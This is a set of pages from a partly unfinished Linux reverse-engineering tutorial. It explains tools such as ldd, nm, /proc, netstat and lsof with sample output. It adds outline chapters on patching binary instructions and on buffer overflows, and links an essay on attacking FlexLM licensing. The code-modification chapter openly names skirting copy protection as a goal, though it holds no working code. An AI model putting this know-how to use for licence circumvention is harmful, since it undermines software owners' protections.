ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN47"/>3. Gathering Info</H1
><P
>Now the fun stuff begins. The first step to figuring out what is going on
in our target program is to gather as much information as we can. Several
tools on Linux allow us to do this. Let's take a look at them.
</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN50"/>3.1. ldd</H2
><P
>&#13; ldd is a basic utility that shows us what libraries a program is linked
against, or if its statically linked. It also gives us the addresses that
these libraries are mapped into the program's execution space, which can
be handy for following function calls in disassembled output (which we
will get to shortly).
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN53"/>3.2. nm</H2
><P
>&#13; nm lists all of the local and library functions, global variables, and
their addresses in the binary. However, it will not work on binaries that
have been stripped with strip.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN56"/>3.3. /proc</H2
><P
>&#13; The Linux /proc filesystem contains all sorts of interesting information,
from where libraries and other sections of the code are mapped, to which
files and sockets are open where. The /proc filesystem contains
a directory for each currently running process. So, if you started a
process whose pid was 3137, you could enter the directory /proc/3137/ to find
out almost anything about this currently running process. You can
only view process information for processes which you own.
</P
><P
>&#13; The files in this directory change with each OS. The interesting ones in Linux are:
cmdline -- lists the command line parameters passed to the process
cwd -- a link to the current working directory of the process
environ -- a list of the environment variables for the process
exe -- the link to the process executable
fd -- a list of the file descriptors being used by the process
maps -- VERY USEFUL. Lists the memory locations in use by this
process. These can be viewed directly with gdb to find out various
useful things.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN60"/>3.4. netstat</H2
><P
>&#13; netstat is handy little tool that is present on all modern operating
systems. It is used to display network connections, routing tables,
interface statistics, and more.
</P
><P
>&#13; How can netstat be useful? Let's say we are trying to reverse engineer
a program that uses some network communication. A quick look at what
netstat displays can give us clues where the program connects and
after some investigation maybe why it connects to this host.
netstat does not only show TCP/IP connections, but also UNIX domain
socket connections which are used in interprocess communication in
lots of programs.
Here is an example output of it:
<PRE
CLASS="screen"
>&#13;Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 slack.localnet:58705 egon.acm.uiuc.edu:ssh ESTABLISHED
tcp 0 0 slack.localnet:51766 gw.localnet:ssh ESTABLISHED
tcp 0 0 slack.localnet:51765 gw.localnet:ssh ESTABLISHED
tcp 0 0 slack.localnet:38980 clortho.acm.uiuc.ed:ssh ESTABLISHED
tcp 0 0 slack.localnet:58510 students-slb.cso.ui:ssh ESTABLISHED
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 5 [ ] DGRAM 68 /dev/log
unix 3 [ ] STREAM CONNECTED 572608 /tmp/.ICE-unix/794
unix 3 [ ] STREAM CONNECTED 572607
unix 3 [ ] STREAM CONNECTED 572604 /tmp/.X11-unix/X0
unix 3 [ ] STREAM CONNECTED 572603
unix 2 [ ] STREAM 572488
</PRE
>
As you can see there is great deal of info shown by netstat. But what
is the meaning of it?
The output is divided in two parts - Internet connections and UNIX
domain sockets as mentioned above. Here is breifly what the Internet
portion of netstat output means. The first column shows the protocol
being used (tcp, udp, unix) in the particular connection. Receiving
and sending queues for it are displayed in the next two columns,
followed by the information identifying the connection - source host
and port, destination host and port. The last column of the output
shows the state of the connection. Since there are several stages in
opening and closing TCP connections, this field was included to show
if the connection is ESTABLISHED or in some of the other available
states. SYN_SENT, TIME_WAIT, LISTEN are the most often seen ones. To
see complete list of the available states look in the man page for
netstat. FIXME: Describe these states.
</P
><P
>&#13; Depending on the options being passed to netstat, it is possible to
display more info. In particular interesting for us is the -p option
(not available on all UNIX systems). This will show us the program
that uses the connection shown, which may help us determine the
behaviour of our target.
Another use of this options is in tracking down spyware programs that
may be installed on your system. Showing all the network connection
and looking for unknown entries is invaluable tool in discovering
programs that you are unaware of that send information to the network.
This can be combined with the -a option to show all connections. By
default listening sockets are not displayed in netstat. Using the -a
we force all to be shown. -n shows numerical IP addesses instead of
hostnames.
<PRE
CLASS="screen"
>&#13; <B
CLASS="command"
>&#13;netstat -p as normal user</B
>
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 slack.localnet:58705 egon.acm.uiuc.edu:ssh ESTABLISHED -
tcp 0 0 slack.localnet:58766 winston.acm.uiuc.ed:www ESTABLISHED 5587/mozilla-bin
</PRE
>
<PRE
CLASS="screen"
>&#13; <B
CLASS="command"
>&#13;netstat -npa as root user</B
>
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 390/smbd
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 737/X
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 78/sshd
tcp 0 0 10.0.0.3:58705 128.174.252.100:22 ESTABLISHED 13761/ssh
tcp 0 0 10.0.0.3:51766 10.0.0.1:22 ESTABLISHED 897/ssh
tcp 0 0 10.0.0.3:51765 10.0.0.1:22 ESTABLISHED 896/ssh
tcp 0 0 10.0.0.3:38980 128.174.252.105:22 ESTABLISHED 8272/ssh
tcp 0 0 10.0.0.3:58510 128.174.5.39:22 ESTABLISHED 13716/ssh
</PRE
>
So this output shows that mozilla has established a connection with
winston.acm.uiuc.edu for HTTP traffic (since port is www(80)). In the
second output we see that the SMB daemon, X server, and ssh daemon
listen for incomming connections.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN70"/>3.5. lsof</H2
><P
>&#13; lsof is a program that lists all open files by the processes running
on a system. An open file may be a regular file, a directory, a block
special file, a character special file, an executing text reference,
a library, a stream or a network file (Internet socket, NFS file or
UNIX domain socket). It has plenty of options, but in its default mode
it gives an extensive listing of the opened files. lsof does not come
installed by default with most of the flavors of Linux/UNIX, so you
may need to install it by yourself. On some distributions lsof
installs in /usr/sbin which by default is not in your path and you
will have to add it.
An example output would be: <PRE
CLASS="screen"
>&#13;COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 101 nasko cwd DIR 3,2 4096 1172699 /home/nasko
bash 101 nasko rtd DIR 3,2 4096 2 /
bash 101 nasko txt REG 3,2 518140 1204132 /bin/bash
bash 101 nasko mem REG 3,2 432647 748736 /lib/ld-2.2.3.so
bash 101 nasko mem REG 3,2 14831 1399832 /lib/libtermcap.so.2.0.8
bash 101 nasko mem REG 3,2 72701 748743 /lib/libdl-2.2.3.so
bash 101 nasko mem REG 3,2 4783716 748741 /lib/libc-2.2.3.so
bash 101 nasko mem REG 3,2 249120 748742 /lib/libnss_compat-2.2.3.so
bash 101 nasko mem REG 3,2 357644 748746 /lib/libnsl-2.2.3.so
bash 101 nasko 0u CHR 4,5 260596 /dev/tty5
bash 101 nasko 1u CHR 4,5 260596 /dev/tty5
bash 101 nasko 2u CHR 4,5 260596 /dev/tty5
bash 101 nasko 255u CHR 4,5 260596 /dev/tty5
screen 379 nasko cwd DIR 3,2 4096 1172699 /home/nasko
screen 379 nasko rtd DIR 3,2 4096 2 /
screen 379 nasko txt REG 3,2 250336 358394 /usr/bin/screen-3.9.9
screen 379 nasko mem REG 3,2 432647 748736 /lib/ld-2.2.3.so
screen 379 nasko mem REG 3,2 357644 748746 /lib/libnsl-2.2.3.so
screen 379 nasko 0r CHR 1,3 260468 /dev/null
screen 379 nasko 1w CHR 1,3 260468 /dev/null
screen 379 nasko 2w CHR 1,3 260468 /dev/null
screen 379 nasko 3r FIFO 3,2 1334324 /home/nasko/.screen/379.pts-6.slack
startx 729 nasko cwd DIR 3,2 4096 1172699 /home/nasko
startx 729 nasko rtd DIR 3,2 4096 2 /
startx 729 nasko txt REG 3,2 518140 1204132 /bin/bash
ksmserver 794 nasko 3u unix 0xc8d36580 346900 socket
ksmserver 794 nasko 4r FIFO 0,6 346902 pipe
ksmserver 794 nasko 5w FIFO 0,6 346902 pipe
ksmserver 794 nasko 6u unix 0xd4c83200 346903 socket
ksmserver 794 nasko 7u unix 0xd4c83540 346905 /tmp/.ICE-unix/794
mozilla-b 5594 nasko 144u sock 0,0 639105 can't identify protocol
mozilla-b 5594 nasko 146u unix 0xd18ec3e0 639134 socket
mozilla-b 5594 nasko 147u sock 0,0 639135 can't identify protocol
mozilla-b 5594 nasko 150u unix 0xd18ed420 639151 socket
</PRE
> Here is brief explanation of some of the abbreviations lsof uses in
its output: <PRE
CLASS="programlisting"
>&#13; cwd current working directory
mem memory-mapped file
pd parent directory
rtd root directory
txt program text (code and data)
CHR for a character special file
sock for a socket of unknown domain
unix for a UNIX domain socket
DIR for a directory
FIFO for a FIFO special file
</PRE
>
</P
><P
> It is pretty handy tool when it comes to investigating program
behavior. lsof reveals plenty of information about what the process is
doing under the surface.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN76"/>3.6. fuser</H2
><P
>&#13; A command closely related to lsof is fuser. fuser accepts as a
command-line parameter the name of a file or socket. It will return the
pid of the process accessing that file or socket.
</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x24.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x79.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>The Linux Compilation Process</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Determining Program Behavior</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

246
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x470.htm Normal file
View File

@@ -0,0 +1,246 @@
<HTML
><HEAD
><TITLE
>Code Modification</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Understanding Copy Protection"
HREF="x467.htm"/><LINK
REL="NEXT"
TITLE="Buffer Overflows"
HREF="x499.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x467.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x499.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN470"/>10. Code Modification</H1
><P
>&#13; So now we know the tools to analyze our programs and find functions of
interest to us even in programs without sourcecode. We can understand
the assembly
that makes them up, and can write assembly of our own to do what we want.
We know how a program looks on the disk and how that corresponds to what
the program looks like in memory. Knowledge is power, and we know a lot.
TODO: Read this: http://hcunix.org/hcunix/terran.txt
</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN473"/>10.1. Reasons for Code Modification</H2
><P
>&#13; Code modification is most useful if we wish to change the behavior of
closed-source programs written by unenlightened authors. It is also
handy when trying to skirt copy protection of various kinds.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN476"/>10.2. Instruction Modification</H2
><P
>&#13; Since the smallest unit of code is the instruction, it follows that
the simplest form of code modification is instruction modification.
In instruction modification, we are looking to change some property of a
specific instruction. Recall from the assembly section that each
instruction has 2 parts: The mnemonic and the arguments. So our choices
are limited.
</P
><P
>&#13; The best way to modify instructions is through <A
HREF="http://hte.sourceforge.net/"
TARGET="_top"
>HT Editor</A
>, which was mentioned
earlier in the ELF section. HTE has a hex editor mode where we can edit
the hex value of an instruction and see the assembly updated in real time.
(TODO: instructions, screenshots of HTE)
</P
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN481"/>10.2.1. Editing the arguments</H3
><P
>&#13; Editing the arguments of an assembly instruction is easy. Simply look
at the hex value of the assembly instruction's argument, and see where
it lies in the hex bytes for that instruction. HTE will allow you to
overwrite these values with values of your own.
(Be careful with byte ordering!).
TODO: Example1.
</P
></DIV
><DIV
CLASS="sect3"
><H3
CLASS="sect3"
><A
NAME="AEN484"/>10.2.2. Editing the Mnemonic</H3
><P
>&#13; This is far more tricky.
</P
></DIV
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN487"/>10.3. Single Instruction Insertion</H2
><P
></P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN490"/>10.4. Single Function Insertion</H2
><P
>Use unused space as found by disasm.pl (be careful about
main)</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN493"/>10.5. Multiple Function Insertion</H2
><P
>Trickery.. We're working on a util to modify ELF programs and insert
functions. What about using MMAP?? (P.S. Can you unmap executable
memory to modify it... if they are doing an MD5 of their
executable)</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN496"/>10.6. Attacking copy protection</H2
><P
>Lest I be accused of hiding in my ivory tower, lets look a
concrete application of these ideas, and some techniques (:</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x467.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x499.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Understanding Copy Protection</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Buffer Overflows</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

190
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x499.htm Normal file
View File

@@ -0,0 +1,190 @@
<HTML
><HEAD
><TITLE
>Buffer Overflows</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Code Modification"
HREF="x470.htm"/><LINK
REL="NEXT"
TITLE="TODO (Contribute!)"
HREF="x520.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x470.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x520.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN499"/>11. Buffer Overflows</H1
><P
>Sometimes you don't have access to the program code.</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN502"/>11.1. Stack Overflows</H2
><P
></P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN505"/>11.2. 1-Byte Overflows</H2
><P
></P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN508"/>11.3. Returning to Libc</H2
><P
></P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN511"/>11.4. Attacking Countermeasures</H2
><P
></P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN514"/>11.5. Heap Overflows</H2
><P
></P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN517"/>11.6. Attacking hard copy protection</H2
><P
></P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x470.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x520.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Code Modification</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>TODO (Contribute!)</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

320
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x520.htm Normal file
View File

@@ -0,0 +1,320 @@
<HTML
><HEAD
><TITLE
>TODO (Contribute!)</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Buffer Overflows"
HREF="x499.htm"/><LINK
REL="NEXT"
TITLE="Extra Resources"
HREF="x578.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x499.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x578.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN520"/>12. TODO (Contribute!)</H1
><P
>&#13; Things that need to get done to this document. Note, none of these things
are going to be particularly easy. But then again, neither was writing up
the rest of this tutorial.
</P
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN523"/>12.1. Write assembly tutorial section</H2
><P
>&#13; This needs to be written for AT&amp;T syntax and as.
</P
><P
>Topics:
<P
></P
><OL
TYPE="1"
><LI
><P
>Asm Basics:</P
><P
></P
><OL
TYPE="a"
><LI
><P
>Common asm instructions and their
side-effects</P
></LI
><LI
><P
>Link to a more complete and comprehensive opcode
description page</P
></LI
></OL
></LI
><LI
><P
>Parts of a program</P
></LI
><LI
><P
>Declairing variables</P
></LI
><LI
><P
>Writing functions</P
></LI
><LI
><P
>Calling functions in libc</P
></LI
><LI
><P
>Calling syscalls</P
></LI
><LI
><P
>Linking against libc</P
></LI
></OL
>
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN547"/>12.2. Create Diagrams &amp; example outputs</H2
><P
>&#13; We need someone to run through the tools showcased here and
generate some sample output files for the more complicated ones.
Also, diagrams for the stack section are needed, as well as the array
section.
</P
><P
>Target programs:
<P
></P
><OL
TYPE="1"
><LI
><P
>opera</P
></LI
><LI
><P
>vmware</P
></LI
><LI
><P
>crossover</P
></LI
><LI
><P
>IDA</P
></LI
></OL
>
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN560"/>12.3. More detail</H2
><P
>More detail is needed in some places, especially in the area of
widget interception. (describing the event loop and suggesting good
breakpoint places for GTK, Qt might be nice)</P
><P
>Add resources and links section for each chapter (where
applicable)</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN564"/>12.4. Update disasm.pl</H2
><P
>&#13; The simpler things to do to this script would be to clean up the
FIXME's, and add options to it (such as --no-show-raw-insn)
Also, making an attempt at derefrencing pointers
based on some heuristic would be nice. Check out <A
HREF="http://hcunix.org/hcunix/siulinux.htm"
TARGET="_top"
>this perl
disassembler</A
> for ideas (not too many ideas.. its output format
sucks).
</P
><P
>&#13; If anyone is feeling extremely hardcore and wants to help modify Steve and
Nasko's perl script to make the output more intuitive, feel free. A
directed graph would be fantastic, automatic determination of main
would also be great (use graph theory on your directed graph). There
is also a utility called ptrace that is part of the LDasm project.
Interfacting it (or gdb) with disasm.pl script to set a break
point for each function would be a heroic task as well (because this
would be the equivalent of ltrace, except for ALL functions in a program,
not just the libs).
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN569"/>12.5. Do this for windows</H2
><P
>&#13; If any of the dual booters in the crowd want to create a similar
document for windows and/or give a talk, submissions are encouraged.
Do note that in the meantime, all of these utils exist for windows as
well, thanks to the cygwin project. (LINK). They should work the same
there.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN572"/>12.6. Do this for protocols</H2
><P
>Protocol reverse engineering is a bit different than software
engineering, tho many of the tools are the same. A tutorial on "reverse
engineering" network protocols and data formats would also be helpful.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN575"/>12.7. Do this for hardware</H2
><P
>&#13; If anyone wants to present tactics for reverse engineering device
drivers or electronic equipment, submissions are also welcome.
</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x499.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x578.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Buffer Overflows</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Extra Resources</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

231
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x578.htm Normal file
View File

@@ -0,0 +1,231 @@
<HTML
><HEAD
><TITLE
>Extra Resources</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="TODO (Contribute!)"
HREF="x520.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x520.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
>&nbsp;</TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"/></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN578"/>13. Extra Resources</H1
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN580"/>13.1. ELF Binary Specification</H2
><P
>&#13; <P
></P
><OL
TYPE="1"
><LI
><P
><A
HREF="ftp://tsx.mit.edu/pub/linux/packages/GCC/ELF.doc.tar.gz"
TARGET="_top"
>&#13; The Official Spec</A
></P
></LI
><LI
><P
><A
HREF="http://www.skyfree.org/linux/references/ELF_Format.pdf"
TARGET="_top"
>Also
in PDF</A
></P
></LI
><LI
><P
><A
HREF="http://www.cs.ucdavis.edu/~haungs/paper/node10.html"
TARGET="_top"
>&#13; More interesting description</A
></P
></LI
><LI
><P
><A
HREF="http://linux4u.jinr.ru/usoft/WWW/www_debian.org/Documentation/elf/elf.html"
TARGET="_top"
>&#13; From a Linux Programmer's Perspective</A
></P
></LI
></OL
>
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN596"/>13.2. Other Resources and amusements</H2
><P
>&#13; <P
></P
><OL
TYPE="1"
><LI
><P
><A
HREF="http://www.geocities.com/rmaxdx/ldasm.html"
TARGET="_top"
>&#13; LDasm project</A
>. LDasm is at best a passable disasembly tool
(disasm.pl is FAR more useful), but it does come with a utility called
ptrace, which allows you to view which instructions of a program
actually execute. You can also give ptrace a list of addresses (for
example, the list of functions found by disasm.pl) and have it step
through those to show you which ones actually execute in your
program.</P
></LI
><LI
><P
><A
HREF="http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html"
TARGET="_top"
>&#13; Creating Teensy Executables in Linux</A
></P
></LI
><LI
><P
><A
HREF="http://www.microsoft.com/hwdev/hardware/downPECOFF.htm"
TARGET="_top"
>&#13; Microsoft COFF format</A
></P
></LI
><LI
><P
><A
HREF="http://hcunix.org/hcunix/siulflex.htm"
TARGET="_top"
>&#13; Attacking FlexLM</A
> is an essay written in 1998 on attacking a specific form of
hard copy protection. There are several <A
HREF="http://hcunix.org/hcunix/essays.html"
TARGET="_top"
> other essays</A
> on that site, but most
of them cover material that we cover above, but with specific example
programs.</P
></LI
></OL
>
</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="x520.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="t1.htm"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>&nbsp;</TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>TODO (Contribute!)</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>&nbsp;</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

272
src/Security/Technical Papers and Notes/Reverse Engineering Guide/x79.htm Normal file
View File

@@ -0,0 +1,272 @@
<HTML
><HEAD
><TITLE
>Determining Program Behavior</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="HOME"
HREF="t1.htm"/><LINK
REL="PREVIOUS"
TITLE="Gathering Info"
HREF="x47.htm"/><LINK
REL="NEXT"
TITLE="Determining Interesting Functions"
HREF="x125.htm"/></HEAD
><BODY
CLASS="sect1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="x47.htm"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
></TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="x125.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
